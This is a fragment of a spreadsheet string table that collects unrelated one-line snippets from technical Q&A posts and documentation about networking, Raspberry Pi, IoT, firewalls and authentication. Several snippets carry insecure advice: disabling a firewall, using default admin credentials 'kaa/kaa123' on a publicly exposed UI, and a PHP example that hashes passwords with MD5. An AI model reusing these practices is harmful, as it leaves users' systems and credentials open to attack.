    <t>The solution to problem 2) is less obvious and involves setting an undocumented flag (at least, it is undocumented in Windows 7 Pro which I have at hands right now) for the Windows time service.</t>
  </si>
  <si>
    <t>Please add the firewall rule to Windows IoT Core like below cmdlet by using PowerShell for windows IoT or running command in Device Portal(Processes-&gt;Run command):
BTW.You can use the following cmdlet to check the rules in your device.</t>
  </si>
  <si>
    <t>It attempts to exploit all known "remote code execution" vulnerabilities in order to install a piece of JavaScript in a general web page template which in turn runs cryptocurrency mining logic in the client side.</t>
  </si>
  <si>
    <t>is a command line-based remote management program, used to control networked devices such as routers (and, presumably, a headless Mac Mini running a Savant server) via SNMP.</t>
  </si>
  <si>
    <t>A single server may have multiple gears running at the same time, each isolated from each other through Linux namespacing and SELinux protection.</t>
  </si>
  <si>
    <t>In contrast to traditional VPN which uses IPSec/IP protocol (with which many home routers and firewalls have issues), it uses TLS over TCP/IP and UDP/IP protocols.</t>
  </si>
  <si>
    <t>Setting up an Apache web server on a Raspberry Pi
What worked for me is that I changed the owner from root to pi for /www/ and /html/ with this commands:
But note that I'm also just using the Apache server for an local installation and I don't care about security at this point.</t>
  </si>
  <si>
    <t>See the second half of this page: https://docs.microsoft.com/en-us/windows/iot-core/develop-your-app/appinstaller 
If the license is not installed and your device can reach the Windows Store servers it will retrieve the license that matches your package from the server.</t>
  </si>
  <si>
    <t>In order for a signed
MIDlet suite to be downloaded,
installed and granted associated
permissions, it must be successfully
authenticated.</t>
  </si>
  <si>
    <t>However more sophisticated routers range from enterprise routers, which connect large business or ISP networks up to the powerful core routers that forward data at high speed along the optical fiber lines of the Internet backbone.</t>
  </si>
  <si>
    <t>The purpose is - 
The device should not be aware of the IOT endpoint, 
Route 53 should be able to identify the region of incoming traffic and directs it to the corresponding endpoint as specified by various records in the hosted zone.</t>
  </si>
  <si>
    <t>You can also accomplish the same thing by mounting the disk image locally:
I likeguestfishbecause it doesn't require root access, and doesn't require mucking about with loop devices and mountpoints, so there's less setup and cleanup.</t>
  </si>
  <si>
    <t>If you're planning to make the MySQL server itself public-facing, you should really re-think that decision unless you know why that's a bad idea and how to properly secure it (but that may not be a concern; for instance I have one at home that is available on the local network, but my router blocks any incoming connections from external sources).</t>
  </si>
  <si>
    <t>My Manifest has an Intent filter that's registering the device, although permissions might have something to do with it.</t>
  </si>
  <si>
    <t>All machines are successfully configured to be on the same wireless network.</t>
  </si>
  <si>
    <t>It's not enough to declare permissions in manifest:
You need to restart the device with the installed application.</t>
  </si>
  <si>
    <t>As you're sitting behind a NAT, that will allow neither direct discovery nor connections; CoAP will not try to magically pierce that.</t>
  </si>
  <si>
    <t>Like sudo itself, rvmsudo should be used with great care to avoid security problems.</t>
  </si>
  <si>
    <t>When it's bundling the install is failing with 
If I "sudo gem install  bcrypt-ruby -v '3.0.1' " then it installs fine, but the capistrano deploy is always failing.</t>
  </si>
  <si>
    <t>A brute force method would be to use regexp with the result.toString() to grab what I want but there must be a better way isn't it?</t>
  </si>
  <si>
    <t>Authentication and download works perfectly on Windows 10 PCs and Tablets that are signed in with a Microsoft Account.</t>
  </si>
  <si>
    <t>For example, if you run Wireshark with the capture filter
you will see a surprising amount of network discovery/announcement traffic from the phone.</t>
  </si>
  <si>
    <t>The I2S audio routes are not exposed through the Peripheral I/O API.</t>
  </si>
  <si>
    <t>Note that daemon threads will continue to run during the shutdown sequence, as will non-daemon threads if shutdown was initiated by invoking the exit method.</t>
  </si>
  <si>
    <t>Something like this
"processing tables for mandb " "fopen permission denied"
So I tried doing
sudo apt-get install iptables
which it said the same fopen error.</t>
  </si>
  <si>
    <t>I wanted to install a library, but it required kernel headers to be installed.</t>
  </si>
  <si>
    <t>If not, than the client is forbidden outgoing communication (less likely), and you will need to shutdown its firewall.</t>
  </si>
  <si>
    <t>If you're using Windows, put the server on the RPi or be 100% sure you've whitelisted Python in your firewall (or deactivated it).</t>
  </si>
  <si>
    <t>If the device is freshly new, it should advertise normally (without setting the whitelist only bit), then any central device could connect and bond.</t>
  </si>
  <si>
    <t>Therefore if you use maps that requires  you will be granted the permission at install time and will not need to code anything for "runtime permissions" as they do not exist.</t>
  </si>
  <si>
    <t>accessKey - (Internet Explorer 4.0+)
If the ACCESSKEY attribute (see above) is set for a link, then the accessKey property reflects the setting, otherwise it remains empty.</t>
  </si>
  <si>
    <t>Unlike optimistic locking, great care must be taken in the application design to avoid deadlocks.</t>
  </si>
  <si>
    <t>Application restrictions allow the enterprise administrator to remotely specify settings for apps.</t>
  </si>
  <si>
    <t>RAMCloud ensures the durability of DRAM-based data by keeping backup copies on secondary storage.</t>
  </si>
  <si>
    <t>So far I've managed to set it as a regular user as stated in their own security website (https://nodered.org/docs/security), but I need to run it as admin in order to save some stuff and found out there's no guidance for such scenario 
(on they way found out there are two versions of Node-red in the raspberry pi, one for 'sudo start-node-red' and another one for 'start-node-red', I'm interested on the first case) 
The one I've managed for the plain user would be editing the settings.js as follows:
Has anyone managed to do so?</t>
  </si>
  <si>
    <t>After setting the passphrase I copied the image to a second SD card and put it in a second RasPi.</t>
  </si>
  <si>
    <t>I was able to connect to the Ad-Hoc network with a laptop running Windows 7 and it successfully was given the IP 10.42.0.69, however, all of my attempts at connecting from the RaspberryPi have failed.</t>
  </si>
  <si>
    <t>I was curious to see if the Arduino Leonardo's keyboard and mouse libraries could possibly be used as a windows user password brute force hacker.</t>
  </si>
  <si>
    <t>I'm trying to install pycrypto for python 3.x.x on raspberry pi
but when i run 
from the command line, it is by default installed to python 2.7.x
i have installed python-dev and still with no luck, i have read that using a PIP might help, but unfortunately i don't know how to use it.</t>
  </si>
  <si>
    <t>I was able to connect to a hotspot that did not require an identity using the code below:
However is there a way to add an identity/username as an extra?</t>
  </si>
  <si>
    <t>I just bought a JBL speaker, tested it on my phone and proceeded with this tutorial on my Raspberry Pi:
https://www.raspberrypi.org/magpi/bluetooth-audio-raspberry-pi-3/
I managed to pair and trust the speaker, but I can't connect to the device from bluetoothctl, only from audio settings.</t>
  </si>
  <si>
    <t>1-Firewall
When We talked about the problem with system admin, He told ust every local network connection and port is open in the firewall.</t>
  </si>
  <si>
    <t>Possibly unrelated, but my Windows 10 laptop does not recognise the device on any USB port (hence I cannot update the firmware).</t>
  </si>
  <si>
    <t>I want to set up a password-less SSH access so that I can upload pictures from the raspberry pi to the windows using SCP.</t>
  </si>
  <si>
    <t>However, I don't know how to set an environment variable in Django for user www-data so that boto3 can now use that environment variable to specify the AWS credentials path.</t>
  </si>
  <si>
    <t>Debian version: Linux debian 4.9.0-9-686-pae #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) i686 GNU/Linux
Update:
I ended up re-installing Raspian Stretch and python gtk2 and that seemed to fix the issue -- something in the environment must have gotten corrupted.</t>
  </si>
  <si>
    <t>I also have been able to authorize a direct call to AWS Services to retrieve a sessionToken from this section of the documentation.</t>
  </si>
  <si>
    <t>Check that the Windows 7 firewall is allowing inbound connections to your selected port (9050).</t>
  </si>
  <si>
    <t>The firewall preferences were set to block incoming traffic for the one version of erlang but not the other.</t>
  </si>
  <si>
    <t>Heres a link about setting default keyboard for X, should help 
Heres a link to setting up and configuring SSH on RPi</t>
  </si>
  <si>
    <t>You can enable remote connections by modifying the configuration file:
Find the  section.</t>
  </si>
  <si>
    <t>So what was happening was that the device I was trying to connect to (an NRF-based BLE device) required the LE address flag to be set to 'random'.</t>
  </si>
  <si>
    <t>Authentication in URL
For web-browsers or utility programs (fetch, curl, lwp-request) that
  can parse authentication section in URL.</t>
  </si>
  <si>
    <t>update: port 8080 is closed externally but functions fine internally, most likely a problem with tomcat configuration/security</t>
  </si>
  <si>
    <t>I wasn't in audio, and I was getting this error because the player stops once it can't find the "default" audio output (since you don't have permissions to access it).</t>
  </si>
  <si>
    <t>Usually you can configure your router (which also works as a firewall) using some sort of web-based interface.</t>
  </si>
  <si>
    <t>If you have installed Kura, it is acting as a firewall so you need to use the Kura Web UI to open tcp port 8083, which is filtered by default.</t>
  </si>
  <si>
    <t>It requires a raspberry sysroot to configure Qt against it:
If the correct stuff is installed in the sysroot, it will detect and configure correctly.</t>
  </si>
  <si>
    <t>It seems as if the shield was set to connect to your WiFi which in turn was set to get an IP address from your WiFi Router.</t>
  </si>
  <si>
    <t>Alternately, you can remote in with PowerShell:
Open an Administrative PowerShell prompt on your computer.</t>
  </si>
  <si>
    <t>Use Renci SSH shell to sign back into the device as an administrator and then use powershell command to set date and time.</t>
  </si>
  <si>
    <t>As I mentioned, I perform the same steps to safely shutdown, unplug, and store.</t>
  </si>
  <si>
    <t>If you set the values to your external address (used by your phone network to access the website), the external access should begin to work, e.g.</t>
  </si>
  <si>
    <t>You could try setting up a bluetooth connection or a token-ring, but I suspect that would be more effort than you are looking for.</t>
  </si>
  <si>
    <t>AWSIoTShadowClient is likely more secure by default as it is already configured to ensure that only a device can set it's reported state.</t>
  </si>
  <si>
    <t>VMs generally set up a private virtual network inside the computer that they're running on with only themselves and that computer on the network.</t>
  </si>
  <si>
    <t>Consider putting some required delays in your code to ensure your device is not blacklisted for abuse of terms.</t>
  </si>
  <si>
    <t>fanotify does not prevent, nor does it
attempt to prevent, malicious code running on the Linux machine.</t>
  </si>
  <si>
    <t>git-verify-pack is a command in git to verify packed git archive files.</t>
  </si>
  <si>
    <t>F6 and RAID BIOS configurations need to be performed prior to installation of this driver for proper operation.</t>
  </si>
  <si>
    <t>These extensions include but they are not limited to: I/O access, data services, watchdog, network configuration and remote management.</t>
  </si>
  <si>
    <t>But some older Bluetooth hardware may receive some Bluetooth v4.2 features, such as privacy updates via firmware.</t>
  </si>
  <si>
    <t>Network Security Groups (NSG)  filters network traffic to and from Azure resources in an Azure virtual network.</t>
  </si>
  <si>
    <t>Administrators can now remotely disable the camera on a managed device for users working in sensitive environments.</t>
  </si>
  <si>
    <t>This back up may prove useful at times such as fire or theft because important data is not lost.</t>
  </si>
  <si>
    <t>When setting up WCF Security for an application, the following parameters need to be configured:
The type of credential required, e.g.</t>
  </si>
  <si>
    <t>The operating system gained the new malware-blocking system Gatekeeper and integration with Apple's online Game Center and iCloud services, while the Safari web browser was updated to version 6.</t>
  </si>
  <si>
    <t>Similarly, if a DACL has ACEs that allow access to a limited set of users or groups, the system implicitly denies access to all trustees not included in the ACEs.</t>
  </si>
  <si>
    <t>It is designed to run in partial trust environments and does not require P/Invoke or unsafe code.</t>
  </si>
  <si>
    <t>For example, using WindowsIdentity and WindowsPrincipal objects, you can write an application that requires all users to be currently validated by a Windows NT or Windows 2000 domain.</t>
  </si>
  <si>
    <t>Secure By Default
All Forge servers require SSH key authentication and user's firewall comes configured out of the box.</t>
  </si>
  <si>
    <t>Passwordless - authenticate users by email and/or SMS without requiring them to remember yet another set of credentials.</t>
  </si>
  <si>
    <t>When describe firewall/gateway requirements using entries in a set of configuration files.</t>
  </si>
  <si>
    <t>Each model contains all the data required to render it and is responsible for declaring itself valid or invalid.</t>
  </si>
  <si>
    <t>To aggregate several contacts fetches, first collect a set of unique identifiers from the fetches.</t>
  </si>
  <si>
    <t>For questions around setting it up, and advanced configuration, the mod-ssl tag on ServerFault is likely to be a better place to ask.</t>
  </si>
  <si>
    <t>Zabbix is installed as an 'agent' on machines to be monitored, with a central server that performs the monitoring.</t>
  </si>
  <si>
    <t>Yes, I know, I have a few denied flags, (1624 helpful, 67 disputed (mainly flagged invalid flags), 28 unhelpful) which means that I have only 98.19 % of accepted/disputed flags but I still think it's pretty fair.</t>
  </si>
  <si>
    <t>Just run this command on host machine
Then change the IP address of using Admin UI, for that you need to
sign in using username : kaa and passwword : kaa123
 then go to setting &gt; general setting then change the IP address preceded by :8080, enter your machine's public IP address, that can be easily accessible from anywhere.</t>
  </si>
  <si>
    <t>Info.plist (information property list) is a structured text file (XML) used in Apple's developer environment and operating systems that contains essential configuration information for a bundled executable.</t>
  </si>
  <si>
    <t>Software is [safety-critical] when an incorrect response or an incorrectly timed response can result in significant loss to its users; in the most extreme case, loss of life may result from such failures.</t>
  </si>
  <si>
    <t>Bluetooth beacons do not require a connection and you read the identifiers directly from the advertisement.</t>
  </si>
  <si>
    <t>If you think you should have a GUI, because you've set things up to, e.g., tunnel X11 through ssh to an X server on your desktop machine, but you're still getting an error from xclip, then the problem is that you've set things up wrong.</t>
  </si>
  <si>
    <t>Authentication is most
commonly done using sshd, but you can also use "smart http" mode if
you prefer (this may require root access to setup).</t>
  </si>
  <si>
    <t>The ability to access your computer from a remote location and thus allowing users to control remote computers from their local machine.</t>
  </si>
  <si>
    <t>":
If you give a foreign application an Intent, and that application
  sends/broadcasts the Intent you gave, they will execute the Intent
  with their own permissions.</t>
  </si>
  <si>
    <t>Installers can make the OMR highly available or fault-tolerant by running it on an Oracle RAC instance across multiple nodes.</t>
  </si>
  <si>
    <t>I tried what is exposed in the following post SOLVED - MySQL - Can't Log In - Access Denied - Brand New Installation (OpenWRT)
With the command line 
mysqladmin -uroot password pwd
I ended with the same answer :
error: 'Access denied for user 'root'@'localhost' (using password:
  NO)'
Could anybody help me or tell me what is the cleanest way to uninstall and fully reinstall MySQL on OpenWRT?</t>
  </si>
  <si>
    <t>At the present time wormhole forwards HTTP traffic to port 80 on your device but forwarding to other ports is not something that can be achieved by default.</t>
  </si>
  <si>
    <t>I made an app for detecting and putting out an option of closing bad posts, but it was replaced with The Tavern + SmokeDetector
I have thick internet skin
I am persistant even though I have been losing this election each year
I make my own decisions, but I'm not afraid to ask someone else for guidance
I don't care who I'm talking to, I treat everyone the fair way
Why I shouldn't be a moderator
These are some things people may say in the comments that I am covering here
I'm not very active on the close vote queue
(This is something I am working on, but I'm also trying to keep my rep up so I don't get cut out of the election)
My reputation is low on meta SE and you are inactive on meta SO (I can't argue with this tbh)</t>
  </si>
  <si>
    <t>PasswordBox control are currently available at two places in .NET:
PasswordBox for WPF present in  namespace
PasswordBox for Universal Windows Platform (UWP) apps present in Windows.UI.Xaml.Controls namespace
PasswordBox control looks like a traditional plain text box control but in place of the text being typed, it shows some mask character configured by the programmer e.g.</t>
  </si>
  <si>
    <t>It uses a combination of filtering categories and word filters, which has been criticized because it can block innocent websites or content protected by free speech, like sexual education websites.</t>
  </si>
  <si>
    <t>Impact printers survive where multi-part forms are needed, as the pins can impress dots through multiple layers of paper to make a carbonless copy, for security purposes.</t>
  </si>
  <si>
    <t>It addition it also can actually control HTTP traffic, such as:
blacklisting and whitelisting certain URL patterns
simulating various bandwidth and latency
remapping DNS lookups
flushing DNS caching
controlling DNS and request timeouts
automatic BASIC authorization</t>
  </si>
  <si>
    <t>DDoS Protection provides always-on network flow monitoring of the protected endpoints, and when a DDoS attack is detected, automatically applies mitigation to ensure only legitimate traffic reaches the service.</t>
  </si>
  <si>
    <t>What i am trying now is to disable hc-05 bluetooth module discovery/visibility to other device.</t>
  </si>
  <si>
    <t>How can we direct a Amazon Echo intent to a private/internal https endpoint?</t>
  </si>
  <si>
    <t>Protecting PII (especially on the internet) has become more and more important as interests looking to discover PII have prevalent.</t>
  </si>
  <si>
    <t>There are a number of flags that can be passed to V8 to expose its internals.</t>
  </si>
  <si>
    <t>Well, the answer is here:
Source
It is not required that you implementing telnet negotiation in any clients and servers you may create, but you need to be aware of it in order to avoid problems that its presence on the other end of your connection may otherwise cause.</t>
  </si>
  <si>
    <t>How can I tell the router to forward this information on without logging in and changing anything with the router.</t>
  </si>
  <si>
    <t>My mqtt broker and my node red is on a local raspberry pi placed safely behind my firewall.</t>
  </si>
  <si>
    <t>Then you should be able to install the oauth tool with pip:
You can display all of your installed packages using pip freeze
pip freeze | grep google</t>
  </si>
  <si>
    <t>My MainActivity has the correct properties:
I can install and run the APK via ADB and when pulled back I can analyze the APK and see that the manifest does indeed have the correct intent-filters but when I restart the device I get the standard Android Things dashboard.</t>
  </si>
  <si>
    <t>WireGuard is an open-source software application and protocol that implements virtual private network techniques to create secure point-to-point connections in routed or bridged configurations.</t>
  </si>
  <si>
    <t>A software is safety-critical when an incorrect response or an incorrectly timed response can result in significant loss to its users; in the most extreme case, loss of life may result from such failures.</t>
  </si>
  <si>
    <t>I installed vlock like this:
When I now log into my pi via SSH from my Windows PC vlock works just fine, but when I try using it on the machine itself it shows a strange behaviour.</t>
  </si>
  <si>
    <t>After some struggle with the python 3.2 versions of the bluetooth and usb libraries it requires i've managed to get it to connect via bluetooth and ask for a passkey.</t>
  </si>
  <si>
    <t>All store signed apps on Windows 10 devices are capable of receiving updates directly from the store.</t>
  </si>
  <si>
    <t>The actor gateway can be effectively used when you cant install the Kaa SDK on your device or you need to use some sophisticated protocol for device-server connectivity.</t>
  </si>
  <si>
    <t>To stop the forwarding from a backgrounded job, you're going to have to find the pid in ps and kill it.</t>
  </si>
  <si>
    <t>If you have an active SSH window running the test.py, you can print directly to it from the RPi.</t>
  </si>
  <si>
    <t>This parameter is normally set for security reasons where the network has been deployed and you want to make absolutely positive that nobody else can join.</t>
  </si>
  <si>
    <t>The leader is a software application in a distributed system which provides the global coordination necessary for servers to perform transactions safely and to ensure clients are not oversubscribed.</t>
  </si>
  <si>
    <t>Shutdown hooks run at a delicate time in the life cycle of a virtual machine and should therefore be coded defensively.</t>
  </si>
  <si>
    <t>Configuration
For greater safety and portability, Heroku allows you to manage environment-specific configuration separately from your source code.</t>
  </si>
  <si>
    <t>All this power is hidden behind the simple user interface, so usually obfuscation is perceived as a piece-of-cake action.</t>
  </si>
  <si>
    <t>User Interface Privilege Isolation (UIPI) implements restrictions in the windows subsystem that prevents lower-privilege applications from sending window messages or installing hooks in higher-privilege processes.</t>
  </si>
  <si>
    <t>For instance, a lot of internet traffic uses the transmission control protocol (TCP) which requires a three-way handshake for each transaction, which, though in many modern implementations is efficient, does add significant overhead compared to simpler protocols.</t>
  </si>
  <si>
    <t>Documentation
Getting Started
Authentication
Common formats
Endpoint reference
Official Libraries
Server
PHP
Python
NodeJS
iOS
VimeoNetworking
PlayerKit
VIMDeepLink
Android (Java)
Vimeo Networking
Vimeo Deeplink
Player API
player.js
News and Updates
Vimeo Status
API Changelog
Vimeo Engineering Blog
Vimeo Staff Twitter
Help, Feedback, and Non-Developer Inquiries
Help Center
Additional Resources
vimeo
vimeo-player
oembed
tus.io
References
Vimeo
Vimeo Developer Site
Vimeo - Wikipedia</t>
  </si>
  <si>
    <t>By no means an exclusive list, vsftpd will handle:
Virtual IP configurations
Virtual users
Standalone or inetd operation
Powerful per-user configurability
Bandwidth throttling
Per-source-IP configurability
Per-source-IP limits
IPv6
Encryption support through SSL integration
etc...</t>
  </si>
  <si>
    <t>Everything works fine except that I don't get any audio out, instead I get the following error message
After googling around I have come to the conclusion that the problem is that Gstreamer is not installed and recognized by Qt (more precisely gst-omx).</t>
  </si>
  <si>
    <t>When running the app locally I can just use  to connect to the share and this works fine, I'm assuming this is because the credentials I'm using are saved on the local machine.</t>
  </si>
  <si>
    <t>However, since I need a new, unique channel every time, and I'd really really prefer to avoid a hacky solution like a timeout (god knows what else I'll run into if I have to do that), I'm asking here.</t>
  </si>
  <si>
    <t>At line:1 char:9
Set-Item &lt;&lt;&lt;&lt;  WSMan:\localhost\Client\TrustedHosts -Value minwinpc
CategoryInfo          : NotSpecified: (:) [Set-Item], InvalidOperationException
FullyQualifiedErrorId : 
System.InvalidOperationException,Microsoft.PowerShell.Commands.SetItemCommand
im sorry, ik others have posted simmilar issues such as
Why doesn't "Set-Item" work on Windows 7 PowerShell?</t>
  </si>
  <si>
    <t>I have never worked with webhooks nor web servers, much less Flask or Zappa before, and I was curious as to how I would set this up without exposing the pi to the open internet on my home network.</t>
  </si>
  <si>
    <t>Loading a secondary app with permissions to shut down, download and restart the "main" app.</t>
  </si>
  <si>
    <t>Actually when I upload my code with my mobile hotspot SSID and password then it's working fine, but as soon as I gave the SSID and password of my router then it's not working.</t>
  </si>
  <si>
    <t>if i set the bluetooth as follow: sudo hciconfig hci0 sspmode 0
when i try to connect to the raspberry, a popup appears in the smartphone required a PIN code, this option may be good, if i new the PIN code.</t>
  </si>
  <si>
    <t>So far i've been able to create the folder and the file using Windows Powershell, but when i try to save data to the file from the application i just get "System.UnauthorizedAccessException: Access to the path 'C:\temp' is denied.</t>
  </si>
  <si>
    <t>That is, the VPN concentrator "sits st the perimeter" of the university network, and when you connect to it, you create a "pass through" into the system behind the firewall - any protocols, any IP addresses inside the firewall become accessible.</t>
  </si>
  <si>
    <t>Since the stream ensures data integrity, you just need to work out framing and ensure that frames arrive in the correct order.</t>
  </si>
  <si>
    <t>But, really, it's not unsafe to open a port on your router, as long as you know what you're doing, and your Pis are carefully locked down.</t>
  </si>
  <si>
    <t>If you configure the XBee with security (look at  (encryption enable), EO (encryption options) and KY (shared link key)), the coordinators and routers will only join each other.</t>
  </si>
  <si>
    <t>I don't know for Raspi B+, but on B kernel interrupts were interfering with software PWM as well, because, as far as I remember, Raspi B has only one hardware PWM pin.</t>
  </si>
  <si>
    <t>It indicates that you don't have admin access to remote machine, which is natural assuming that you didn't have activated developer mode in BOTH machines.</t>
  </si>
  <si>
    <t>You need to install the generated certificates manually in  and set the external url to https in /etc/gitlab/gitlab.rb as described in: https://gitlab.com/gitlab-org/omnibus-gitlab/blob/master/doc/settings/nginx.md</t>
  </si>
  <si>
    <t>Please redact any grains which you feel have personally-identifiable information, I'm mainly interested in the grains that deal with OS name and version.</t>
  </si>
  <si>
    <t>If your raspberry pi is hosted on a private network you would need to configure your router to forward requests on a given port (e.g.</t>
  </si>
  <si>
    <t>That permission is currently marked as a dangerous permission, which would typically require granting at runtime by the user on standard Android.</t>
  </si>
  <si>
    <t>You could look into creating an ad-hoc network between the two machines, which is basically a direct connection that does not involve any intermediate routers.</t>
  </si>
  <si>
    <t>If you want to go the create+delete route then mktemp would be a good tool to use for that, in order to avoid clobbering someone else's legitimate file.</t>
  </si>
  <si>
    <t>Any router or end devices joining a network with consult their SC parameters first, then they will try and search for networks they can join which match their PAN and security parameters.</t>
  </si>
  <si>
    <t>Strong Parameters requires whitelisting of Action Controller parameters by default.</t>
  </si>
  <si>
    <t>In Java, `sun.misc.Unsafe` is a special class performing low-level, unsafe operations.</t>
  </si>
  <si>
    <t>An application domain is an isolated environment in which Microsoft .NET assemblies can be sandboxed, granted specific permissions or PermissionSets and executed.</t>
  </si>
  <si>
    <t>This tag is about the Microsoft Detours library for intercepting arbitrary Win32 binary functions on x86, x64, and ARM machines.</t>
  </si>
  <si>
    <t>If such server runs multiple virtual machines, these should be called "virtual private servers", while, especially in marketing materials, may also be named "dedicated".</t>
  </si>
  <si>
    <t>A whitelist is a list of entities that are being authorized for some access or action (entities not in the whitelist are not authorized).</t>
  </si>
  <si>
    <t>Whitelist is more secure but also more restricted approach than blacklist that only lists banned entities, authorizing all others.</t>
  </si>
  <si>
    <t>SSHFS (Secure Shell File System) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer.</t>
  </si>
  <si>
    <t>This creates a network connection that allows Windows-based computers to access remote networks through, for example, a virtual private network, or vpn.</t>
  </si>
  <si>
    <t>Equipped with nothing but an ID, a peer can create a P2P data or media stream connection to a remote peer.</t>
  </si>
  <si>
    <t>For example, a file might have the extra attribute:
indicating that the directory had been copied from the internet and had not yet been marked as clean/safe.</t>
  </si>
  <si>
    <t>Mailman supports archiving, bounce processing,  filtering, digest delivery, spam filters, and more.</t>
  </si>
  <si>
    <t>When a user requests access to a resource, the access token is checked against the ACL to permit or deny particular action on a particular object.</t>
  </si>
  <si>
    <t>I received super moderator-powers due to being accidentally bitten by a radioactive moderator.</t>
  </si>
  <si>
    <t>When I install and try to run, it throws an error
DLL load failed, %1 is not valid win32 application
So, as a first step, I would like to create an installer for a 64-bit target and see if it works.</t>
  </si>
  <si>
    <t>It appears that it may be because Linux systems do not try to retry/retransmit a SYN after a RST, whereas Windows ones do - and this behaviour seems key to how this peculiar piece of hardware works..
Background:
We have a black box piece of hardware that can be controlled and queried over a network, by using a manufacturer-supplied Windows application.</t>
  </si>
  <si>
    <t>To successfully pass the HTTPS fetching tests, you may need to first set environment variables to find the certificate files.</t>
  </si>
  <si>
    <t>Each document is a set of rules aiming to create a safer sub-set of the respective language.</t>
  </si>
  <si>
    <t>As its name suggests, STONITH fences failed nodes by sending a message to remotely power down the failed node.</t>
  </si>
  <si>
    <t>Root yourself up 
Check to see which IP address that your Android device is using
arp -a
Mine is 192.168.42.129
Add a default route pointing all traffic from your Pi out to your Android device.</t>
  </si>
  <si>
    <t>Risk management occurs any time if somebody analyzes and tires to quantify the potential for losses or gains of a given decision.</t>
  </si>
  <si>
    <t>Then either having that job when it runs react to telemetry and hit an endpoint Function when it hits the target condition, or go through authenticating the job itself with the IoT Admin SDK.</t>
  </si>
  <si>
    <t>Authorization and access control policies can be configured for service endpoints within PingAccess, providing a single place to make and enforce access decisions.</t>
  </si>
  <si>
    <t>Setting my job to a lower nice value (which requires root privileges) gives it a higher priority and prevents it from being paused.</t>
  </si>
  <si>
    <t>Feature flags give a software organization the power to reduce risk, iterate quicker, and gain more control.</t>
  </si>
  <si>
    <t>I would like to isolate the IoT stuff (such as Thing, Certificates...) for different environments; 
If we use a separated root account to setup IoT, we have to move other existing environments (EC2/S3) to the new root account to integrate with the corresponding IoT environment, that is not what we want;
Is it possible for one AWS root account?</t>
  </si>
  <si>
    <t>No directly but this is the key:
Is this even possible directly without some sort of proxy
If you are not limited from environment or the place where your system will be placed a good way to tackle this is to not expose the ESP to the public but rather keep it in your private network and proxy it from Apache2, NginX or whatever you like to the users.</t>
  </si>
  <si>
    <t>So to make it work the other way, you need to install an SSH server on your windows machine.</t>
  </si>
  <si>
    <t>I just used  to gain root access and everything worked fine.</t>
  </si>
  <si>
    <t>The Wire library is not that great when it comes to stability, 
 reliability, it can cause the hardware to freeze because of
 infinite loops inside the library when connection is lost or
 the connection is unstable for some reason.</t>
  </si>
  <si>
    <t>This can be as simple as a database to which your Flask app writes a "task request", the other, privileged process reads this request, performs the action, and updates the databases.</t>
  </si>
  <si>
    <t>Important note: They only work on trusted websites: Sites with https or on localhost (for testing purposes)
Here is a tutorial on offline support with service workers: https://css-tricks.com/serviceworker-for-offline/ But there are other great tutorials out there too!</t>
  </si>
  <si>
    <t>Q&amp;A: Undocumented features:
Chrome Extension: Adobe Flash Player has stopped a potentially unsafe operation
The cross-origin policy makes it impossible to control flash players through the ordinary JavaScript API.</t>
  </si>
  <si>
    <t>This is for an embedded system using node.js in the background to handle hardware io, but it will need a network connection to function so I want to ensure users are locked out of the browsers (the various Ctrl+Alt+F* shortcuts have already been removed, Chromium is all that remains in making it a real kiosk system).</t>
  </si>
  <si>
    <t>I have certain doubts about how a client not present in the same LAN as the server, can discover this server and the resources exposed by it.</t>
  </si>
  <si>
    <t>The purpose is: Access a site that is on the rasp, via a network (no internet needed), like you do with your router when you configure it.</t>
  </si>
  <si>
    <t>I can use IMAP and POP just fine to receive mail with my credentials just fine also.</t>
  </si>
  <si>
    <t>Make sure RTS is connected as well -- that control signal is required to get into the bootloader when installing new firmware.</t>
  </si>
  <si>
    <t>Find where Cygwin placed and copy the address.Go to  Windows Control Panel-&gt;System and Security-&gt;System-&gt;Advanced 
System settings-&gt;Environment Variables-&gt;System Variables-&gt;Path add a semicolon(;) and paste the address to here.</t>
  </si>
  <si>
    <t>Esky provides a simple API, by the main interface, the 'Esky' class, through which apps can find, fetch and install updates, and a bootstrapping mechanism that keeps the app safe in the face of failed or partial updates.</t>
  </si>
  <si>
    <t>Queues can be used in your Firebase app to organize workers or perform background work like generating thumbnails of images, filtering message contents and censoring data, or fanning data out to multiple locations in your Firebase database.</t>
  </si>
  <si>
    <t>There is no outside interference that I can detect and all nodes are within reach (if not, the network discovery would have failed).</t>
  </si>
  <si>
    <t>The RaspberryPI has network/internet connection, but for security reasons it's not an option to set up SMB / FTP server on the raspi.</t>
  </si>
  <si>
    <t>In this way you can use your raw Tomcat configuration and let other program take care of securing the communication channel.</t>
  </si>
  <si>
    <t>In this situation, we look forward to alternative ways
Without certified IC / authentication process, we completed iOS external accessory, anyway.</t>
  </si>
  <si>
    <t>Update: I rolled back the configuration to not use the RTC module anymore, disabled I2C, and reinstalled fake-hwclock.</t>
  </si>
  <si>
    <t>This creates the cycle of closing the holes and finding new ones to gain root access to the device.</t>
  </si>
  <si>
    <t>Windows Runtime (WinRT) is a Microsoft platform architecture that allows applications to run in a sandboxed environment exposing a Windows Modern Style UI/UX (previously known by it's codename 'Metro', see microsoft-metro)
WinRT is the set of APIs, specifications and architecture that enable and create a sandbox to allow and simplify access to the operating system and the underlying hardware.</t>
  </si>
  <si>
    <t>This is simply not possible, when running my script through a website, via wsgi, as apache will not let me (for good reason) set the WSGIDaemonProcess's user to root.</t>
  </si>
  <si>
    <t>(I suppose a side question worth asking is whether there might be some kind of peer-peer configuration that would be preferable.</t>
  </si>
  <si>
    <t>That can be done as follows:
Install rsync
The next step is to install rsync, a utility that allows you synchronize directories between two computers.</t>
  </si>
  <si>
    <t>To avoid JavaScript injection, developers avoid as much as possible to return the user supplied strings back to the browser.</t>
  </si>
  <si>
    <t>I have a couple of questions:
does the client require connectivity to network in order to be created/initialized?</t>
  </si>
  <si>
    <t>Assuming you have them enabled: the problem may be a firewall configuration issue on the Windows 7 side.</t>
  </si>
  <si>
    <t>"Windows Update and Automatic Updates are two separate components designed to work together to keep Windows secure. "</t>
  </si>
  <si>
    <t>Can be used this way:
$allowed = array("name","surname","email"); // allowed fields
$sql = "INSERT INTO users SET ".pdoSet($allowed,$values);
$stm = $dbh-&gt;prepare($sql);
$stm-&gt;execute($values);
Or, for a more complex case:
$allowed = array("name","surname","email","password"); // allowed fields
$_POST['password'] = MD5($_POST['login'].$_POST['password']);
$sql = "UPDATE users SET ".pdoSet($allowed,$values)."</t>
  </si>
  <si>
